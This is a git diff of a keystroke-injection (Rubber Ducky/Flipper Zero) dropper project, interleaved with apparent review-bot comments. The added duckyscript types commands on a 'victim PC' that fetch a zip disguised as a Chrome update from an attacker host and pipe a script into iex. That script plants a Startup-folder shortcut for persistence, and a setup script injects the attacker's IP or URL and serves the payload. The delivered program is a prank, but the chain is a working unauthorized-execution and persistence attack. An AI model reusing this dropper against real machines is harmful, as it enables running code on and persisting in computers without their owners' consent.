diff --git a/Duckyscripts/GooseDropper/GooseDropper.txt b/Duckyscripts/GooseDropper/GooseDropper.txt
index 6a7cfce..13392f9 100644
--- a/Duckyscripts/GooseDropper/GooseDropper.txt
+++ b/Duckyscripts/GooseDropper/GooseDropper.txt
@@ -4,9 +4,9 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r
 DELAY 500
 GUI r
 DELAY 500
-STRING powershell wget YOUR_IP:1337/update.zip -OutFile $ENV:Temp/Updater.zip
+STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
 ENTER
-DELAY 5000
+DELAY 8000
 GUI r
 DELAY 500
 STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
@@ -14,5 +14,10 @@ ENTER
 DELAY 3000
 GUI r
 DELAY 500
+STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
+ENTER
+DELAY 1000
+GUI r
+DELAY 500
 STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
 ENTER
diff --git a/Duckyscripts/GooseDropper/PersistentGoose.ps1 b/Duckyscripts/GooseDropper/PersistentGoose.ps1
new file mode 100644
index 0000000..94e731b
--- /dev/null
+++ b/Duckyscripts/GooseDropper/PersistentGoose.ps1
@@ -0,0 +1,6 @@
+$WScriptShell = New-Object -ComObject WScript.Shell
+$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
+$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
+$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
+$Shortcut.TargetPath = $TargetFile
+$Shortcut.Save()
\ No newline at end of file
diff --git a/Duckyscripts/GooseDropper/README.md b/Duckyscripts/GooseDropper/README.md
index 3f8b63b..32c8114 100644
--- a/Duckyscripts/GooseDropper/README.md
+++ b/Duckyscripts/GooseDropper/README.md
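Review bot: PersistentGoose.ps1 has no header comment stating what it leaves on the machine, and nothing in the file tells someone running it in a lab how to undo it. The six added lines write `HONK.lnk` into the current user's Startup folder with its target under `$env:Temp\Chrome_Update\Update`, which per the README change is meant to outlast a reboot, so the artifact stays until it is deleted by hand. I would add a first line such as `# Creates Startup\HONK.lnk -> %TEMP%\Chrome_Update\Update\GooseDesktop.exe; delete that .lnk and the Chrome_Update folder to clean up.` That path pair is also what to check when confirming a test machine has been restored.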
@@ -1,23 +1,27 @@ -======= Goose Dropper ======== +**======= Goose Dropper v2.0 ========** -This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose on a Windows PC. +This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE** + +------------------------------------------------------------------------------------------------------ Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually: - 1) Replace the YOUR_IP value in GooseDropper.txt with your IP + 1) Replace the YOUR_IP value in GooseDropper.txt with your IP. - 2) Download Desktop Goose and extract it, rename the DesktopGoose v.031 from inside the zip to Update - - 3) Re-ZIP the Update directory and name it Chrome_Updater.txt - - 4) Start some form of simple webserver/fileshare on port 1337 - - 5) Copy to your Flipper or Rubber-Ducky and PWN! + 2) Download Desktop Goose and extract it, rename the 'DesktopGoose v.031' folder from inside the zip to Update. -Important Notes: + 3) Copy PersistentGoose.ps1 into the newly renamed Update folder. + + 4) Re-ZIP the Update directory and name it Chrome_Updater.txt. + + 5) Start some form of simple webserver/fileshare on port 1337 (or change the port to reflect your choice). + + 6) Copy to your Flipper or Rubber-Ducky and PWN! + +-------------------------------------------------------------------------------------------------------------- + +**Important Notes:** Ensure configuration is run while on the same network as your target, re-configure with each new network. -Currently a reboot will kill the process, however persistance is being worked on. - All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet diff --git a/Duckyscripts/GooseDropper/linux_setup.sh b/Duckyscripts/GooseDropper/linux_setup.sh index 55da368..5c9a65f 100644 
--- a/Duckyscripts/GooseDropper/linux_setup.sh +++ b/Duckyscripts/GooseDropper/linux_setup.sh @@ -1,15 +1,44 @@ #!/bin/bash -#Grab your local IP to add to the payload -SRC="$(ip route show | grep default | cut -d ' ' -f 9)" +#Determine the source of the DesktopGoose download +echo "1) Local Webserver | 2) Persistant URL" + +read -p "Select a download source [1/2]: " DL + +if [ "${DL}" == "1" ]; +then + echo "Grabbing your IP" + + #Grab your local IP to add to the payload + SRC="$(ip route show | grep default | cut -d ' ' -f 9)" + + #Add your IP to the payload + sed -i "s/YOUR_IP/$SRC/" GooseDropper.txt + + sleep 5s && clear + +elif [ "${DL}" == "2" ]; +then + #Get your URL + read -p "Enter your URL: " SRC + + #Add your URL to the payload + sed -i "s/powershell wget YOUR_IP:1337 -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt + + #Remind users to have the zip ready + echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL" + + sleep 5s && clear + +else + echo "Please enter a valid selection" + exit + +fi #Check if Desktop Goose is present in this directory GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')" -#Add the IP to the payload -sed -i "s/YOUR_IP/$SRC/" GooseDroper.txt - -#Check if [ "${GOOSE}" == "" ]; then echo "Desktop Goose is not present in this directory, download it, or move it here" 
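Review bot: In the `elif [ "${DL}" == "2" ]` branch the value read into `SRC` is pasted unescaped into a `sed` program that uses `/` as its delimiter, so any input containing `/` or `&` is parsed as part of the expression instead of being inserted literally; an ordinary `http://host/file.zip` value makes `sed` fail, and with no status check the script carries on with GooseDropper.txt unmodified. Read the value with `read -r -p "Enter your URL: " SRC` and escape it before substitution, e.g. `esc=$(printf '%s' "$SRC" | sed 's/[\/&]/\\&/g')`, then use `$esc` in the replacement. The final `else` branch also calls a bare `exit`, which reports status 0 for an invalid selection; `exit 1` would make the failure visible to a caller. The `if [ "${GOOSE}" == "" ]` block that closes this hunk continues outside it.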
@@ -18,16 +47,36 @@ then else unzip "Desktop Goose v0.31.zip" mv "Desktop Goose v0.31/DesktopGoose v0.31" Update + mv PersistentGoose.ps1 Update/ zip -r Chrome_Update.zip Update rm -rf "Desktop Goose v0.31"* Update - read -p "Configuration finished! Start python webserver now? [Y/N]" START + clear fi +read -p "Configure Persistence? [Y/N]: " PERSIST + +if [ "${PERSIST,,}" == "n" ]; +then + sed -i "15d;16d;17d;18d;19d" GooseDropper.txt +else + break +fi + +if [ "${DL}" == "1" ]; +then + clear + read -p "Configuration finished! Start python webserver now? [Y/N]: " START + clear +else + clear + break +fi if [ "${START,,}" == "y" ]; then + echo "Starting Server... Happy PWNing! (don't be a skid)" python3 -m http.server 1337 && echo "PWNED!" else clear - echo "Server not started, thank you!" + echo "Finished... Happy PWNing (don't be a skid)!" fi diff --git a/Duckyscripts/GooseDropper/testing/.gitignore b/Duckyscripts/GooseDropper/testing/.gitignore new file mode 100644 index 0000000..e69de29 diff --git a/Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip b/Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip new file mode 100644 index 0000000..646ca9b Binary files /dev/null and b/Duckyscripts/GooseDropper/testing/Desktop Goose v0.31.zip differ diff --git a/Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk b/Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk new file mode 100644 index 0000000..13392f9 --- /dev/null +++ b/Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk 
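Review bot: Both new `else` arms (after the persistence prompt and after the `[ "${DL}" == "1" ]` test) call `break`, but neither `if` is inside a loop, so bash only prints a complaint that `break` is meaningful in a loop and continues; drop those `else` arms or use `:` as the no-op. Separately, `mv PersistentGoose.ps1 Update/` followed by `rm -rf "Desktop Goose v0.31"* Update` removes the tracked script from the working directory on every run, which looks like the reason testing/recover.sh copies it back from a `.bk` file; `cp PersistentGoose.ps1 Update/` keeps the original in place. The hunk opens inside an `if` whose start is outside it.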
@@ -0,0 +1,23 @@
+REM TITLE GooseDropper
+REM AUTHOR Fr3ki
+REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
+ENTER
+DELAY 8000
+GUI r
+DELAY 500
+STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
+ENTER
+DELAY 3000
+GUI r
+DELAY 500
+STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
+ENTER
+DELAY 1000
+GUI r
+DELAY 500
+STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
+ENTER
diff --git a/Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk b/Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk
new file mode 100644
index 0000000..94e731b
--- /dev/null
+++ b/Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk
@@ -0,0 +1,6 @@
+$WScriptShell = New-Object -ComObject WScript.Shell
+$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
+$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
+$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
+$Shortcut.TargetPath = $TargetFile
+$Shortcut.Save()
\ No newline at end of file
diff --git a/Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip b/Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip
new file mode 100644
index 0000000..646ca9b
Binary files /dev/null and b/Duckyscripts/GooseDropper/testing/bk_Desktop Goose v0.31.zip differ
diff --git a/Duckyscripts/GooseDropper/testing/recover.sh b/Duckyscripts/GooseDropper/testing/recover.sh
new file mode 100644
index 0000000..3cc35ef
--- /dev/null
+++ b/Duckyscripts/GooseDropper/testing/recover.sh
@@ -0,0 +1,6 @@
+#!/bin/bash
+
+cp PersistentGoose.ps1.bk PersistentGoose.ps1
+cp "bk_Desktop Goose v0.31.zip" "Desktop Goose v0.31.zip"
+cp GooseDropper.txt.bk GooseDropper.txt
+rm Chrome_Update.zip